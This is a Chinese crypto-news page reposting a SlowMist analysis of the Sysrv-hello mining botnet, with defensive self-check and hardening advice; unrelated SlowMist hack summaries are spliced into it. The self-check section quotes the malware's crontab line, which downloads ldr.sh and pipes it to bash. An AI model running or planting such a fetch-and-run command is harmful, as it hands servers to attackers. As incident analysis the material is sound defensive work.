以太幣交易所 以太幣交易所
Ctrl+D 以太幣交易所
ads
首頁 > MANA > Info

慢霧:技術拆解 Sysrv-hello 僵尸網絡入侵原理_TOR

Author:

Time:1900/1/1 0:00:00

攻擊路徑

Sysrv-hello僵尸網絡對云上NexusRepositoryManager3存在默認帳號密碼的服務器進行攻擊,Maven私服部署會用到NexusRepositoryManager3,由于Maven是個流行服務,所以也給了Sysrv-hello僵尸網絡的大范圍感染機會。

當NexusRepositoryManager3服務對外網開放且存在默認賬號密碼時,Sysrv-hello就可以直接掃描入侵,利用NexusRepositoryManager3的Tasks功能模塊直接運行惡意腳本達到入侵服務器的目的。

慢霧:Uwerx遭受攻擊因為接收地址會多銷毀掉from地址轉賬金額1%的代幣:金色財經報道,Uwerx遭到攻擊,損失約174.78枚ETH,據慢霧分析,根本原因是當接收地址為 uniswapPoolAddress(0x01)時,將會多burn掉from地址的轉賬金額1%的代幣,因此攻擊者利用uniswapv2池的skim功能消耗大量WERX代幣,然后調用sync函數惡意抬高代幣價格,最后反向兌換手中剩余的WERX為ETH以獲得利潤。據MistTrack分析,黑客初始資金來自Tornadocash轉入的10 BNB,接著將10 BNB換成1.3 ETH,并通過Socket跨鏈到以太坊。目前,被盜資金仍停留在黑客地址0x605...Ce4。[2023/8/2 16:14:10]

入侵到服務器后會自動下載執行ldr.sh文件,該文件主要功能:1.禁用Linux服務器防火墻(ufw)及清空iptables2.刪除aliyun、yunjing等主機安全軟件3.禁用apparmor、selinux、watchdog等安全機制4.刪除其他競品5.下載門羅幣挖礦程序進行挖礦,文件與進程名為network016.下載第二個木馬sysrv進行更高級操作7.在crontab里加上尾巴

慢霧:GenomesDAO被黑簡析:據慢霧區hacktivist消息,MATIC上@GenomesDAO項目遭受黑客攻擊,導致其LPSTAKING合約中資金被非預期的取出。慢霧安全團隊進行分析有以下原因:

1.由于GenomesDAO的LPSTAKING合約的initialized函數公開可調用且無權限與不可能重復初始化限制,攻擊者利用initialized函數將合約的stakingToken設置為攻擊者創建的虛假LP代幣。

2.隨后攻擊者通過stake函數進行虛假LP代幣的抵押操作,以獲得大量的LPSTAKING抵押憑證。

3.獲得憑證后再次通過initialized函數將合約的stakingToken設置為原先真是的LP代幣,隨后通過withdraw函數銷毀LPSTAKING憑證獲取合約中真實的LP抵押物。

4.最后將LP發送至DEX中移除流動性獲利。

本次事件是因為GenomesDAO的LPSTAKING合約可被任意重復初始化設置關鍵參數而導致合約中的抵押物被惡意耗盡。[2022/8/7 12:07:06]

第二個木馬sysrv的主要功能:1.確保門羅幣挖礦程序network01正常運行2.進行蠕蟲傳播,隨機掃描其他IP服務,同樣進行NexusRepositoryManager3漏洞利用,同時也會嘗試入侵MySQL、Tomcat、WebLogic等服務

慢霧:Let's Encrypt軟件Bug導致3月4日吊銷 300 萬個證書:Let's Encrypt由于在后端代碼中出現了一個錯誤,Let's Encrypt項目將在撤銷超過300萬個TLS證書。詳情是該錯誤影響了Boulder,Let's Encrypt項目使用該服務器軟件在發行TLS證書之前驗證用戶及其域。慢霧安全團隊提醒:數字貨幣行業有不少站點或內部系統為安全目的而使用 Let's Encrypt 自簽證書,請及時確認是否受到影響。如有影響請及時更新證書,以免造成不可預知的風險。用戶可查看原文鏈接在線驗證證書是否受到影響。[2020/3/4]

自查方法

進程:network01sysrv

文件:/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口:52013

存在以上這些,停止備份樣本后刪除。

加固建議

刪除NexusRepositoryManager3Tasks里的惡意代碼NexusRepositoryManager3嚴禁外網訪問,嚴禁默認賬號密碼NexusRepositoryManager3升級為最新版本被入侵服務器備份重要數據后,重配置或重做檢查被入侵服務器是否存在直接訪問生產網其他服務的能力,存在則在生產網其他服務所在的服務器上進一步分析是否有異常免責聲明:作為區塊鏈信息平臺,本站所發布文章僅代表作者個人觀點,與鏈聞ChainNews立場無關。文章內的信息、意見等均僅供參考,并非作為或被視為實際投資建議。

本文來源于非小號媒體平臺:

慢霧科技

現已在非小號資訊平臺發布68篇作品,

非小號開放平臺歡迎幣圈作者入駐

入駐指南:

/apply_guide/

本文網址:

/news/9606255.html

免責聲明:

1.資訊內容不構成投資建議,投資者應獨立決策并自行承擔風險

2.本文版權歸屬原作所有,僅代表作者本人觀點,不代表非小號的觀點或立場

上一篇:

深入解析MakeDao在新周期里的機遇和風險

Tags:TORRYMASTAREPtorn幣最新消息INSTAR幣REP價格

MANA
炒幣教父1.24:比特幣看漲勢頭已減弱 牛市何在?_比特幣

轉眼間,中國的2020年即將過去。很多朋友依舊認為2021年依舊還是對于比特幣充滿希望的一年,在2020年下半年的比特幣走勢依舊可以看出可能再次創造新高.

1900/1/1 0:00:00
幣姥爺:大航海時代,ETH 強勢回歸_ETH

今天的封面是《阿姆斯特蓋港口的帆船》,塞繆爾·阿特金斯以太坊大有獨立行情趨勢,以下是Bill給大家梳理的強勢理由.

1900/1/1 0:00:00
隊長:1.25比特幣上攻受阻尋求支撐以太坊想乘勢崛起稱王稱霸_以太坊

大家早上好,我是玩幣隊長。霧里看花總是模糊不清,就像行情走勢一樣。對于行情,你總是在猶猶豫豫,如霧里看花一樣看不清方向,這樣你才會總是錯過或者做錯。錯過還好就怕你是做錯了.

1900/1/1 0:00:00
【公示】“ATC交易大賽”01.22獲獎名單_BANK

尊敬的LBank用戶: LBank現公示從01月21日17:00至01月22日17:00交易量排名前三的中獎名單,具體情況如下:*為保證活動公平,LBank嚴禁刷單、對敲等作弊行為.

1900/1/1 0:00:00
關于CoinBene合約保險升級的公告_OIN

尊敬的用戶: 為提升合約保險的使用體驗,CoinBene將于2021年1月25日15:00升級合約保險產品規則,以下是升級詳情:升級完成后.

1900/1/1 0:00:00
關于暫停NEX持幣生息的公告_USHI

尊敬的LBank用戶: 應項目方要求,LBank已于今日暫停NEX持幣生息,今日產生的收益將于今日完成發放.

1900/1/1 0:00:00
ads